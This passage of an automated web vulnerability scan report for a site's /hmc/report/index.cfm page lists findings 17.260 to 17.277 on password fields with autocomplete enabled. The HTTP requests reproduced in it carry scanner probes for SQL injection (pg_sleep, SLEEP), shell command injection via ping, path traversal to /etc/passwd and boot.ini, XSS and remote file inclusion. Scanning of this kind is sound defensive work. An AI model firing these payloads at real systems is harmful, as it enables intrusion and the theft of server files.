       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.260. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.261. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.262. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.263. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.264. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.265. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.266. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.267. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.268. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.269. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.270. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.271. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.272. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.273. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.274. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.275. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt='%3E%3Cnet%20sparker=netsparker(0x00001B)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x00001b)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.276. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.277. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
